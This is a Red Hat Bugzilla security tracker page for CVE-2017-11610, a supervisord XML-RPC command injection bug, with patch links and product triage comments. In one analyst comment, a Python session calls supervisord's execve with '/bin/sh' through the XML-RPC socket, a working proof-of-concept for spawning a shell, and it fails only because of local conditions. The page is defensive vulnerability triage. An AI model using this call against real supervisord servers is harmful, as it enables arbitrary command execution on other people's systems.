Bug 1476143 - (CVE-2017-11610) CVE-2017-11610 supervisor: Command injection via malicious XML-RPC request
CVE-2017-11610 supervisor: Command injection via malicious XML-RPC request
Status: NEW
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
medium Severity medium
: ---
: ---
Assigned To: Red Hat Product Security
impact=moderate,public=20170724,repor...
: Security
Depends On: 1476145 1476286 1477924 1476144 1476287 1476355 1476356
Blocks: 1476147
  Show dependency treegraph
 
Reported: 2017-07-28 02:57 EDT by Andrej Nemec
Modified: 2017-08-03 05:19 EDT (History)
27 users (show)

See Also:
Fixed In Version: supervisor 3.3.3
Doc Type: If docs needed, set a value
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed:
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Andrej Nemec 2017-07-28 02:57:02 EDT
 A vulnerability has been found where an authenticated client can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this may be root.

Upstream issue:

https://github.com/Supervisor/supervisor/issues/964

Upstream patches:

3.3.3 https://github.com/Supervisor/supervisor/commit/058f46141e346b18dee0497ba11203cb81ecb19e
3.2.4 https://github.com/Supervisor/supervisor/commit/aac3c21893cab7361f5c35c8e20341b298f6462e
3.1.4 https://github.com/Supervisor/supervisor/commit/dbe0f55871a122eac75760aef511efc3a8830b88
3.0.1 https://github.com/Supervisor/supervisor/commit/83060f3383ebd26add094398174f1de34cf7b7f0
Comment 1 Andrej Nemec 2017-07-28 02:57:27 EDT
Created supervisor tracking bugs for this issue:

Affects: epel-all [bug 1476145]
Affects: fedora-all [bug 1476144]
Comment 2 Siddharth Sharma 2017-07-28 06:49:10 EDT
Analysis:

Default install on Red Hat Ceph Storage does not run any service on port 9001 and does not accept connection. 

~]$ python2
Python 2.7.5 (default, Aug  2 2016, 04:20:16) 
[GCC 4.8.5 20150623 (Red Hat 4.8.5-4)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from xmlrpclib import ServerProxy
>>> from supervisor.xmlrpc import SupervisorTransport
>>> server = ServerProxy('http://127.0.0.1/RPC2', SupervisorTransport('', '', 'unix:///var/tmp/supervisord.sock'))
>>> server.supervisor.supervisord.options.execve('/bin/sh', [], {})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib64/python2.7/xmlrpclib.py", line 1233, in __call__
    return self.__send(self.__name, args)
  File "/usr/lib64/python2.7/xmlrpclib.py", line 1587, in __request
    verbose=self.__verbose
  File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 460, in request
    self.connection.request('POST', handler, request_body, self.headers)
  File "/usr/lib64/python2.7/httplib.py", line 1017, in request
    self._send_request(method, url, body, headers)
  File "/usr/lib64/python2.7/httplib.py", line 1051, in _send_request
    self.endheaders(body)
  File "/usr/lib64/python2.7/httplib.py", line 1013, in endheaders
    self._send_output(message_body)
  File "/usr/lib64/python2.7/httplib.py", line 864, in _send_output
    self.send(msg)
  File "/usr/lib64/python2.7/httplib.py", line 826, in send
    self.connect()
  File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 481, in connect
    self.sock.connect(self.socketfile)
  File "/usr/lib64/python2.7/socket.py", line 224, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 2] No such file or directory

supervisor package is used by calamari which uses following configuration in default install 

~]# vi /etc/supervisor/conf.d/calamari.conf

[supervisord]
loglevel=warn
logfile=/var/log/calamari/supervisord.log
childlogdir=/var/log/calamari

[program:carbon-cache]
command=/opt/calamari/venv/bin/carbon-cache.py --debug --config /etc/graphite/carbon.conf start

[program:cthulhu]
command=/opt/calamari/venv/bin/cthulhu-manager
stderr_logfile = /var/log/calamari/cthulhu_stderr.log
stdout_logfile = /var/log/calamari/cthulhu_stdout.log


http server is not enabled
~]# vi /etc/supervisord.conf 
;[inet_http_server]         ; inet (TCP) server disabled by default
;port=127.0.0.1:9001        ; (ip_address:port specifier, *:port for all iface)


1. If server is enabled is enabled (manually enabling server)
INFO RPC interface 'supervisor' initialized
CRIT Server 'inet_http_server' running without any HTTP authentication checking
INFO supervisord started with pid 23888
TRAC XML-RPC method called: supervisor.supervisord.options.execve()


2. with unix domain socket:

>>> from xmlrpclib import ServerProxy
>>> from supervisor.xmlrpc import SupervisorTransport
>>> server = ServerProxy('http://127.0.0.1/RPC2',SupervisorTransport('', '', 'unix:///tmp/supervisord.sock'))
>>> server.supervisor.supervisord.options.execve('/bin/sh', [], {})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib64/python2.7/xmlrpclib.py", line 1233, in __call__
    return self.__send(self.__name, args)
  File "/usr/lib64/python2.7/xmlrpclib.py", line 1587, in __request
    verbose=self.__verbose
  File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 460, in request
    self.connection.request('POST', handler, request_body, self.headers)
  File "/usr/lib64/python2.7/httplib.py", line 1017, in request
    self._send_request(method, url, body, headers)
  File "/usr/lib64/python2.7/httplib.py", line 1051, in _send_request
    self.endheaders(body)
  File "/usr/lib64/python2.7/httplib.py", line 1013, in endheaders
    self._send_output(message_body)
  File "/usr/lib64/python2.7/httplib.py", line 864, in _send_output
    self.send(msg)
  File "/usr/lib64/python2.7/httplib.py", line 826, in send
    self.connect()
  File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 481, in connect
    self.sock.connect(self.socketfile)
  File "/usr/lib64/python2.7/socket.py", line 224, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 13] Permission denied
Comment 5 Jason Shepherd 2017-07-31 00:32:12 EDT
Supervisor is used by the Nagios componet of RHMAP. In the supervisor configuration the XMLRPC plugin is not enabled. Also the Nagios images only exposes port 8080 (httpd), not (9001) XMLRPC network port.

Marking RHMAP as not affected.
Comment 6 Kurt Seifried 2017-07-31 08:02:23 EDT
Updated CVSSv3 score to reflect the fact that while several products use this component they do not expose he supervisor service to the network by default. Downgrading to medium because of this and the fact that these products also do not have local untrusted user accounts.

Note You need to log in before you can comment on or make changes to this bug.